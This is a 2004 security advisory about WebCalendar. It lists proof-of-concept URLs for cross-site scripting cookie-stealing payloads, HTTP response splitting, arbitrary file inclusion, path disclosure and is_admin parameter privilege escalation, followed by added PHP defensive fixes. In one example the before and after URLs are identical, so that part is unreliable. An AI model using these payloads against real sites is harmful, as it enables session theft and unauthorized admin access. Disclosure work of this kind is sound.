webcalendar.txt

2004-11-12T00:00:00
ID PACKETSTORM:35001
Type packetstorm
Reporter Joxean Koret
Modified 2004-11-12T00:00:00

Description

---------------------------------------------------------------------------   
Multiple Vulnerabilities in WebCalendar   
---------------------------------------------------------------------------   
  
Author: Jose Antonio Coret (Joxean Koret)   
Date: 2004   
Location: Basque Country   
  
---------------------------------------------------------------------------   
  
Affected software description:   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
  
WebCalendar - Web Calendar Application   
  
WebCalendar is a PHP application used to maintain a calendar for a single
user or an intranet group of users. It can also be configured as an event
calendar.
  
Web : http://webcalendar.sourceforge.net   
  
---------------------------------------------------------------------------   
  
Vulnerabilities:   
~~~~~~~~~~~~~~~~   
  
A. Cross Site Scripting Vulnerabilities in various scripts.

A1. WebCalendar checks for the <script>any</script> form of XSS payloads but
does not check for <img src ... onload=...> based attacks. To test the
vulnerabilities you can try the following PoCs:
  
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001   
  
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009   
  
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
  
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001   
  
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001   
  
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>   
  
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>   
NOTE: Almost any GLOBAL parameter in this script is vulnerable.
  
  
B. HTTP Response Splitting Error

B1. Due to poor input validation in the script login.php, HTTP Response
Splitting attacks are possible. You can test the vulnerability with the
following PoC:

http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all
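One way login.php could neutralise the return_path value before it reaches a Location header, as an added PHP example that is not part of the advisory or of WebCalendar. It assumes the script redirects with header("Location: $return_path"); the function name safe_return_path is hypothetical and the attack value is the PoC above after URL decoding.

```php
<?php
// Added example, not WebCalendar's code. Assumes login.php redirects with
// header("Location: $return_path"); the attack value below is the advisory's
// PoC after URL decoding, constructed here for the demonstration.

function safe_return_path($path, $default = 'index.php')
{
    // A CR or LF would terminate the Location header and let the value
    // inject further headers, or a whole second response as in the PoC.
    if (preg_match('/[\r\n]/', $path)) {
        return $default;
    }
    // Only accept a relative path inside the application: an allow-list
    // of characters that excludes ':' (so no scheme), no leading '/',
    // and no '..' segments. An empty value fails the first test.
    if (!preg_match('#^[A-Za-z0-9_./?=&%,-]+$#', $path)
        || $path[0] === '/' || strpos($path, '..') !== false) {
        return $default;
    }
    return $path;
}

$candidates = array(
    // A legitimate return path from the calendar itself.
    'view_entry.php?id=41972&date=20041001',
    // The advisory's PoC: CRLF pairs followed by a fabricated response.
    "\r\nContent-Length:0\r\n\r\nHTTP/1.1 200 OK\r\n\r\nContent-Type:text/html\r\nContent-Length:9\r\nHi to all",
    // An absolute URL: the allow-list keeps redirects inside the app.
    'http://example.invalid/',
    // Missing parameter.
    '',
);

foreach ($candidates as $c) {
    // Every rejected value collapses to the safe default destination.
    echo json_encode($c), ' -> ', safe_return_path($c), "\n";
}

// In login.php the header would be built from the validated value only:
// header('Location: ' . safe_return_path(isset($_GET['return_path']) ? $_GET['return_path'] : ''));
```

Modern PHP's header() itself refuses values containing a newline, but validating the value before it reaches the header is still the right place to stop it and also keeps the redirect target inside the application.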
  
  
C. Possible code execution

C1. If an attacker is able to place a file in the web directory (for example
via FTP or some other means), a flaw allows any file in the web tree to be
executed. To test the vulnerability you can try this URL:

http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other

Note: at the very least this is a full path disclosure.
  
D. Full Path Disclosure

D1. Because of poor validation of the parameter encoded_login in the PHP
script validate.php, the full path of the script on the web server is
disclosed:

http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login=
(Full Path Disclosure)
  
E. Admin Privileges

E1. Various actions require being the administrator of the WebCalendar
application, but several scripts are vulnerable to variable poisoning
attacks. Privilege escalation is possible using the following methods:
  
  
Example 1 :   
  
You do not have permission:
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true   
  
But using this you do:
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true   
  
Example 2 :   
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=   
  
Example 3 :   
  
No permission ->   
http://webcalendar.sourceforge.net/demo/upcoming.php   
Permission granted :) ->
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y   
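Sections C and E are both consequences of request parameters becoming PHP variables under register_globals (or the functions.php hack quoted in the Notes section that emulates it). The following added PHP example, not the advisory's or WebCalendar's code, shows the defensive pattern for both: an exact allow-list for user_inc and an admin flag derived from the session rather than the request; the include directory, the allowed file names and the session layout are assumptions.

```php
<?php
// Added example, not WebCalendar's code, covering sections C and E. With
// register_globals=On every query parameter becomes a PHP variable, so
// ?user_inc=... and ?is_admin=true simply assign $user_inc and $is_admin.
// Variable names follow the advisory; the include directory, the allowed
// file names and the session layout are assumptions for this example.

// Weak pattern (what register_globals enables, for contrast):
//   include $user_inc;        // the request picks the file
//   if ($is_admin) { ... }    // the request sets the flag

// Resolve the user-backend include from an exact allow-list of names.
function resolve_user_inc($requested, $include_dir, array $allowed)
{
    // basename() discards any directory part; the remaining name must
    // match an allowed entry exactly, otherwise fall back to the default.
    $name = basename((string) $requested);
    if (!in_array($name, $allowed, true)) {
        $name = $allowed[0];
    }
    return $include_dir . '/' . $name;
}

// Derive privilege from server-side session state only.
function is_admin_from_session(array $session, array $admins)
{
    $login = isset($session['login']) ? $session['login'] : '';
    return $login !== '' && in_array($login, $admins, true);
}

// Constructed request and session mirroring the advisory's scenario:
// a file placed in the web tree, and is_admin=true in the query string.
$_GET    = array('user_inc' => '../uploaded_file.php', 'is_admin' => 'true');
$session = array('login' => 'demo');
$admins  = array('admin');
$allowed = array('user.php', 'user-ldap.php');   // assumed file names

// Sensitive state is assigned here, from trusted sources, regardless of
// register_globals and regardless of what the request contained.
$is_admin = is_admin_from_session($session, $admins);
$user_inc = resolve_user_inc(isset($_GET['user_inc']) ? $_GET['user_inc'] : '',
                             __DIR__ . '/includes', $allowed);

printf("user_inc = %s\nis_admin = %s\n", $user_inc, $is_admin ? 'true' : 'false');
```

The other half of the fix is initialising every variable before it is read: a variable the script assigns before use cannot be pre-set by the request.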
  
Notes   
~~~~~   
  
The weak method used in the script functions.php to protect against XSS
attacks is the following:
  
// This code is a temporary hack to make the application work when
// register_globals is set to Off in php.ini (the default setting in
// PHP 4.2.0 and after).
if ( ! empty ( $HTTP_GET_VARS ) ) {
  while (list($key, $val) = @each($HTTP_GET_VARS)) {
    // don't allow anything to have <script> in it...
    // (case-insensitive, but it only ever matches a literal "<script")
    if ( ! is_array ( $val ) ) {
      if ( preg_match ( "/<\s*script/i", $val ) ) {
        echo "Security violation!"; exit;
      }
    }
    // remainder of the loop body not shown in the advisory
  }
}
  
It is very easy to bypass these basic checks by using Unicode-encoded
strings, or any other valid XSS vector, such as <img src attacks.
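The blacklist quoted above and the <img src ... onload> PoCs of section A side by side, as an added PHP example that is not part of the advisory or of WebCalendar: the preg_match check from functions.php next to an output-encoding alternative (htmlspecialchars with ENT_QUOTES, a general fix and not a description of WebCalendar's actual CVS fix), run over payloads taken from the PoCs with the image URL replaced by a placeholder.

```php
<?php
// Added example, not WebCalendar's code. It runs the advisory's blacklist
// from functions.php beside an output-encoding alternative, against
// payloads taken from the PoCs in section A (image URL is a placeholder).

// The check WebCalendar applied to every scalar GET value.
function blacklist_rejects($val)
{
    return preg_match("/<\s*script/i", $val) === 1;
}

// The durable fix: do not try to recognise attacks on input; encode on
// output so the browser treats the value as text, never as markup.
// ENT_QUOTES also encodes the double quote the PoCs use to break out of
// an attribute value (e.g. id=41972"><img ...).
function render_safely($val)
{
    return htmlspecialchars($val, ENT_QUOTES, 'UTF-8');
}

$payloads = array(
    // Caught: contains a literal "<script".
    'script'  => '<script>alert(document.cookie)</script>',
    // Missed: no "<script" anywhere, yet the onload handler still runs.
    'img'     => '"><img src=http://example.invalid/x.gif onload=javascript:alert(document.cookie)>',
    // Missed: no new tag at all, just an event handler attribute.
    'onclick' => '" onclick=javascript:alert(document.cookie)>',
);

foreach ($payloads as $name => $p) {
    // Whatever the blacklist decided, the encoded form is inert markup.
    printf("%-8s blacklist: %-6s encoded output: %s\n",
        $name,
        blacklist_rejects($p) ? 'reject' : 'pass',
        render_safely($p));
}
```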
  
More Notes   
~~~~~~~~~~   
  
The WebCalendar developers (in particular Jeff Hoover) have shown seriousness
in their fixes and responses regarding these errors.
  
The fix:   
~~~~~~~~   
  
The problems have been fixed in the CVS repository.
  
Disclaimer:   
~~~~~~~~~~~   
  
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
  
---------------------------------------------------------------------------   
  
Contact:   
~~~~~~~~   
  
Joxean Koret at   
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es   
  
  
  